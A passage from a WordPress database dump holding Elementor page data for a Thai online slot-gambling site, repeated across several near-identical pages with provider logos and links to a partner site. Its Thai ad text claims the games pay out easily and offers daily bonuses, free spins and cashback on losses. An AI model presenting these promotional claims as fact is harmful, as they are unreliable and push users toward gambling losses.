\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e01\\u0e21\\u0e21\\u0e35\\u0e04\\u0e27\\u0e32\\u0e21\\u0e40\\u0e2a\\u0e16\\u0e35\\u0e22\\u0e23 \\u0e20\\u0e32\\u0e1e\\u0e2a\\u0e27\\u0e22 \\u0e41\\u0e25\\u0e30\\u0e41\\u0e15\\u0e01\\u0e44\\u0e27 \\u0e16\\u0e39\\u0e01\\u0e43\\u0e08\\u0e2a\\u0e32\\u0e22\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e23\\u0e38\\u0e48\\u0e19\\u0e43\\u0e2b\\u0e21\\u0e48 \\u0e23\\u0e27\\u0e21\\u0e40\\u0e01\\u0e21\\u0e2e\\u0e34\\u0e15\\u0e2b\\u0e25\\u0e32\\u0e01\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e04\\u0e48\\u0e32\\u0e22 \\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e14\\u0e15\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e43\\u0e0a\\u0e49\\u0e07\\u0e32\\u0e19\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e21\\u0e37\\u0e2d\\u0e16\\u0e37\\u0e2d\\u0e41\\u0e25\\u0e30\\u0e04\\u0e2d\\u0e21\\u0e1e\\u0e34\\u0e27\\u0e40\\u0e15\\u0e2d\\u0e23\\u0e4c \\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e22\\u0e39\\u0e2a\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e1f\\u0e23\\u0e35\\u0e17\\u0e38\\u0e01\\u0e27\\u0e31\\u0e19 \\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e1f\\u0e23\\u0e35 \\u0e41\\u0e25\\u0e30\\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15\\u0e04\\u0e37\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e21\\u0e2d\\u0e07\\u0e2b\\u0e32\\u0e1b\\u0e23\\u0e30\\u0e2a\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e13\\u0e4c\\u0e2a\\u0e19\\u0e38\\u0e01 \\u0e15\\u0e37\\u0e48\\u0e19\\u0e40\\u0e15\\u0e49\\u0e19 \\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27 \\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e44\\u0e23\\u0e01\\u0e47\\u0e15\\u0e32\\u0e21 \\u0e04\\u0e27\\u0e23\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e21\\u0e35\\u0e2a\\u0e15\\u0e34 \\u0e41\\u0e25\\u0e30\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e17\\u0e35\\u0e48\\u0e21\\u0e35\\u0e2d\\u0e32\\u0e22\\u0e38 18 \\u0e1b\\u0e35\\u0e02\\u0e36\\u0e49\\u0e19\\u0e44\\u0e1b\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19 \\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1a\\u0e31\\u0e19\\u0e40\\u0e17\\u0e34\\u0e07 \\u0e41\\u0e25\\u0e30\\u0e04\\u0e27\\u0e32\\u0e21\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e34\\u0e14\\u0e0a\\u0e2d\\u0e1a\\u0e15\\u0e48\\u0e2d\\u0e01\\u0e32\\u0e23\\u0e40\\u0e07\\u0e34\\u0e19\\u0e02\\u0e2d\\u0e07\\u0e15\\u0e19\\u0e40\\u0e2d\\u0e07<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"953f46b\",\"elType\":\"section\",\"settings\":{\"structure\":\"32\"},\"elements\":[{\"id\":\"cca046d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"6986c03\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/PG.webp\",\"id\":287,\"size\":\"\",\"alt\":\"PG\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":5,\"blur\":25,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"9ee3b73\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"_inline_size_mobile\":50},\"elements\":[{\"id\":\"313c578\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Microgaming.webp\",\"id\":286,\"size\":\"\",\"alt\":\"Microgaming\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":5,\"blur\":25,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"053c361\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"_inline_size_mobile\":50},\"elements\":[{\"id\":\"60b9d1b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/JILI.webp\",\"id\":291,\"size\":\"\",\"alt\":\"JILI\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":5,\"blur\":25,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d93020a\",\"elType\":\"section\",\"settings\":{\"structure\":\"31\"},\"elements\":[{\"id\":\"68262e3\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_mobile\":50},\"elements\":[{\"id\":\"05f18b4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/JOKER.webp\",\"id\":292,\"size\":\"\",\"alt\":\"JOKER\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":5,\"blur\":25,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"268ff30\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_mobile\":50},\"elements\":[{\"id\":\"a316455\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Slot-xo.webp\",\"id\":285,\"size\":\"\",\"alt\":\"Slot xo\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":5,\"blur\":25,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"db9361a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"5a3a81d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/pragmatic.webp\",\"id\":284,\"size\":\"\",\"alt\":\"pragmatic\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":5,\"blur\":25,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(2934,394,'_thumbnail_id','354'),(2937,395,'_elementor_edit_mode','builder'),(2938,395,'_elementor_template_type','wp-page'),(2939,395,'_elementor_version','3.35.5'),(2940,395,'_elementor_pro_version','3.32.3'),(2941,395,'_wp_page_template','default'),(2942,395,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(2943,395,'_elementor_data','[{\"id\":\"598df98\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"1de4a1b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"dd4f8a9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Demo-play-slot-Banner-AMB18.webp\",\"id\":354,\"size\":\"\",\"alt\":\"\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/luca333auto.com\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aaa47de\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"2a7956e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"a97ca87\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e1f\\u0e23\\u0e35 \\u0e04\\u0e25\\u0e34\\u0e01!\",\"align\":\"justify\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Prompt\",\"typography_font_weight\":\"800\",\"hover_animation\":\"pulse-shrink\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"motion_fx_tilt_direction\":\"negative\",\"_animation\":\"none\",\"link\":{\"url\":\"https:\\/\\/luca333auto.com\\/\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"button_text_color\":\"#FFFFFF\",\"hover_color\":\"#E6C300\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"d82bac9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"763d481\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\",\"align\":\"justify\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Prompt\",\"typography_font_weight\":\"800\",\"hover_animation\":\"pulse-shrink\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"motion_fx_tilt_direction\":\"negative\",\"_animation\":\"none\",\"link\":{\"url\":\"https:\\/\\/amb18b.com\\/promotion\\/\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"hover_color\":\"#E9C500\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b45af85\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1bdd864\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"6e50ba5\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 YOK789 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e15\\u0e23\\u0e07\\u0e2d\\u0e31\\u0e19\\u0e14\\u0e31\\u0e1a 1 \\u0e23\\u0e27\\u0e21\\u0e40\\u0e01\\u0e21\\u0e41\\u0e15\\u0e01\\u0e44\\u0e27 \",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6f8cc97\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p data-pm-slice=\\\"0 0 []\\\">\\u0e17\\u0e32\\u0e07\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19 YOK789 \\u0e04\\u0e37\\u0e2d\\u0e41\\u0e1e\\u0e25\\u0e15\\u0e1f\\u0e2d\\u0e23\\u0e4c\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e2d\\u0e2d\\u0e19\\u0e44\\u0e25\\u0e19\\u0e4c\\u0e17\\u0e35\\u0e48\\u0e44\\u0e14\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e19\\u0e34\\u0e22\\u0e21\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27 \\u0e14\\u0e49\\u0e27\\u0e22\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e15\\u0e23\\u0e07\\u0e44\\u0e21\\u0e48\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e40\\u0e2d\\u0e40\\u0e22\\u0e48\\u0e19\\u0e15\\u0e4c \\u0e41\\u0e25\\u0e30\\u0e43\\u0e0a\\u0e49 API \\u0e41\\u0e17\\u0e49\\u0e08\\u0e32\\u0e01 USA \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e01\\u0e21\\u0e21\\u0e35\\u0e04\\u0e27\\u0e32\\u0e21\\u0e40\\u0e2a\\u0e16\\u0e35\\u0e22\\u0e23 \\u0e20\\u0e32\\u0e1e\\u0e2a\\u0e27\\u0e22 \\u0e41\\u0e25\\u0e30\\u0e41\\u0e15\\u0e01\\u0e44\\u0e27 \\u0e16\\u0e39\\u0e01\\u0e43\\u0e08\\u0e2a\\u0e32\\u0e22\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e23\\u0e38\\u0e48\\u0e19\\u0e43\\u0e2b\\u0e21\\u0e48 \\u0e23\\u0e27\\u0e21\\u0e40\\u0e01\\u0e21\\u0e2e\\u0e34\\u0e15\\u0e2b\\u0e25\\u0e32\\u0e01\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e04\\u0e48\\u0e32\\u0e22 \\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e14\\u0e15\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e43\\u0e0a\\u0e49\\u0e07\\u0e32\\u0e19\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e21\\u0e37\\u0e2d\\u0e16\\u0e37\\u0e2d\\u0e41\\u0e25\\u0e30\\u0e04\\u0e2d\\u0e21\\u0e1e\\u0e34\\u0e27\\u0e40\\u0e15\\u0e2d\\u0e23\\u0e4c \\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e22\\u0e39\\u0e2a\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e1f\\u0e23\\u0e35\\u0e17\\u0e38\\u0e01\\u0e27\\u0e31\\u0e19 \\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e1f\\u0e23\\u0e35 \\u0e41\\u0e25\\u0e30\\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15\\u0e04\\u0e37\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e21\\u0e2d\\u0e07\\u0e2b\\u0e32\\u0e1b\\u0e23\\u0e30\\u0e2a\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e13\\u0e4c\\u0e2a\\u0e19\\u0e38\\u0e01 \\u0e15\\u0e37\\u0e48\\u0e19\\u0e40\\u0e15\\u0e49\\u0e19 \\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27 \\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e44\\u0e23\\u0e01\\u0e47\\u0e15\\u0e32\\u0e21 \\u0e04\\u0e27\\u0e23\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e21\\u0e35\\u0e2a\\u0e15\\u0e34 \\u0e41\\u0e25\\u0e30\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e17\\u0e35\\u0e48\\u0e21\\u0e35\\u0e2d\\u0e32\\u0e22\\u0e38 18 \\u0e1b\\u0e35\\u0e02\\u0e36\\u0e49\\u0e19\\u0e44\\u0e1b\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19 \\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1a\\u0e31\\u0e19\\u0e40\\u0e17\\u0e34\\u0e07 \\u0e41\\u0e25\\u0e30\\u0e04\\u0e27\\u0e32\\u0e21\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e34\\u0e14\\u0e0a\\u0e2d\\u0e1a\\u0e15\\u0e48\\u0e2d\\u0e01\\u0e32\\u0e23\\u0e40\\u0e07\\u0e34\\u0e19\\u0e02\\u0e2d\\u0e07\\u0e15\\u0e19\\u0e40\\u0e2d\\u0e07<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"953f46b\",\"elType\":\"section\",\"settings\":{\"structure\":\"32\"},\"elements\":[{\"id\":\"cca046d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"6986c03\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/PG.webp\",\"id\":287,\"size\":\"\",\"alt\":\"PG\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":5,\"blur\":25,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"9ee3b73\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"_inline_size_mobile\":50},\"elements\":[{\"id\":\"313c578\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Microgaming.webp\",\"id\":286,\"size\":\"\",\"alt\":\"Microgaming\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":5,\"blur\":25,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"053c361\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"_inline_size_mobile\":50},\"elements\":[{\"id\":\"60b9d1b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/JILI.webp\",\"id\":291,\"size\":\"\",\"alt\":\"JILI\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":5,\"blur\":25,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d93020a\",\"elType\":\"section\",\"settings\":{\"structure\":\"31\"},\"elements\":[{\"id\":\"68262e3\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_mobile\":50},\"elements\":[{\"id\":\"05f18b4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/JOKER.webp\",\"id\":292,\"size\":\"\",\"alt\":\"JOKER\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":5,\"blur\":25,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"268ff30\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_mobile\":50},\"elements\":[{\"id\":\"a316455\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Slot-xo.webp\",\"id\":285,\"size\":\"\",\"alt\":\"Slot xo\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":5,\"blur\":25,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"db9361a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"5a3a81d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/pragmatic.webp\",\"id\":284,\"size\":\"\",\"alt\":\"pragmatic\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":5,\"blur\":25,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(2944,395,'_thumbnail_id','354'),(2947,396,'_elementor_edit_mode','builder'),(2948,396,'_elementor_template_type','wp-page'),(2949,396,'_elementor_version','3.35.5'),(2950,396,'_elementor_pro_version','3.32.3'),(2951,396,'_wp_page_template','default'),(2952,396,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(2953,396,'_elementor_data','[{\"id\":\"598df98\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"1de4a1b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"dd4f8a9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/u